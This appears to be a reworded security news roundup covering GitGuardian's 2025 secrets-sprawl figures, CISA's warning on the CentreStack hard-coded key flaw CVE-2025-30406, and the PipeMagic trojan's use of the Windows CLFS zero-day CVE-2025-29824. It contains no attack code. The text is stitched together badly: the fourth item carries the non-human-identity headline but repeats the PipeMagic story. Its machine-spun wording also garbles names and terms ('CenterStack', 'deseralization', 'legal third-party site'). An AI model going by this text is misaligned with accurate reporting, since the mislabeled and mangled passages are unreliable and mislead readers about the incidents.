The Hackers Around Us:News

1-Explosive Non-Human Identity Growth Making Massive Security Gaps

The State of Secrets Sprawl study from GitGuardian for 2025 exposes the concerning extent of secrets exposed in contemporary software systems. Driving this is the fast expansion of non-human identities (NHIs), which for years have been outnumbered by human users. As these machine identities are being used, generating until unheard-of security risk, we must get ahead of it and ready security mechanisms and governance for these machine identities.

This paper exposes shockingly 23.77 million fresh secrets disclosed on GitHub only in 2024. This is a 25% increase over last year. This tremendous rise emphasizes how quickly the explosion of non-human identities (NHIs), including service accounts, microservices, and artificial intelligence agents, is extending the attack surface for threat actors.

Now in DevOps contexts at least 45-to- 1, NHI secrets including API keys, service accounts, and Kubernetes workers exceed human identities. Modern infrastructure depends on these machine-based credentials, yet improperly handled they pose major security risks.

Most worrisome is the continuation of exposed credentials. According to GitGuardian's research, a systematic failure in credential rotation and management techniques is shown by 70% of secrets initially discovered in public repositories back in 2022 still alive now.

2-CISA Notes Hard-Coded MachineKey Vulnerability Enabling RCE Attacks in CentreStack

Citing evidence of active wild exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday included a severe security issue affecting Gladinet CentreStack on its Known Exploited Vulnerabilities (KEV) catalog.

Tracked as CVE-2025-30406 (CVSS score: 9.0), the vulnerability relates to a situation of a hard-coded cryptographic key that may be utilized to reach remote code execution under misuse. Version 16.4.10315.56EA published on April 3, 2025 has addressed it.

"Gladinet CenterStack uses hard-coded cryptographic key vulnerability in the manner the application manages keys used for ViewState integrity verification," CISA warned. "Effective exploitation lets an attacker create ViewState payloads for server-side deseralization, so enabling remote code execution."

3-PipeMagic Trojan Uses Windows Zero-Day Vulnerability to Release Ransomware

Microsoft has disclosed that ransomware attacks aiming at a limited number of targets used a now-patched security issue hitting the Windows Common Log File System (CLFS).

The IT behemoth said: "The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia."

CVE-2025-29824 is the vulnerability in question; a privilege escalation flaw in CLFS that might be taken advantage of to provide SYSTEM rights. Redmond corrected it included in its April 2025 Patch Tuesday release.

With the threat actors also using a virus called PipeMagic to distribute the attack as well as ransomware payloads, Microsoft is monitoring the activities and post-compromise exploitation of CVE-2025-29824 under the alias Storm-2460.

4-Explosive Non-Human Identity Growth Making Massive Security Gaps

Microsoft stated that a now-patched Windows Common Log File System (CLFS) security hole was used as a zero-day in ransomware attacks on a few targets.

"The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia," the company claimed.

CVE-2025-29824, a CLFS privilege escalation problem, might provide SYSTEM rights. Redmond corrected it in April 2025 Patch Tuesday.

Microsoft is following the post-compromise exploitation of CVE-2025-29824 under Storm-2460, which uses PipeMagic to deliver the vulnerability and ransomware payloads.

The assaults' original access route is unknown. They have been seen utilizing certutil to download malware from a legal third-party site that was hacked to stage payloads.

The virus is an MSBuild file with an encrypted payload that unpacks to execute PipeMagic, a plugin-based trojan found in 2022.

PipeMagic provided the second Windows zero-day issue, CVE-2025-29824, after ESET and Microsoft corrected CVE-2025-24983, a Windows Win32 Kernel Subsystem privilege escalation problem, last month.

PipeMagic was also used in Nokoyawa ransomware operations that exploited another CLFS zero-day issue (CVE-2023-28252).

"In some of the other attacks that we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victim's machines were infected with a custom modular backdoor named 'PipeMagic' that gets launched via an MSBuild script," Kaspersky said in April 2023.

Importantly, this attack does not impact Windows 11, version 24H2, because SeDebugPrivilege, which only admin-like users can receive, restricts access to some System Information Classes inside NtQuerySystemInformation.

"The exploit targets a CLFS kernel driver vulnerability," Microsoft Threat Intelligence said. "The exploit then utilizes a memory corruption and the RtlSetAllBits API to overwrite the exploit process's token with the value 0xFFFFFFFF, enabling all privileges for the process, which allows for process injection into SYSTEM processes."

References

https://thehackernews.com/2025/04/pipemagic-trojan-exploits-windows-clfs.html

https://thehackernews.com/2025/04/cisa-warns-of-centrestacks-hard-coded.html

https://thehackernews.com/2025/04/explosive-growth-of-non-human.html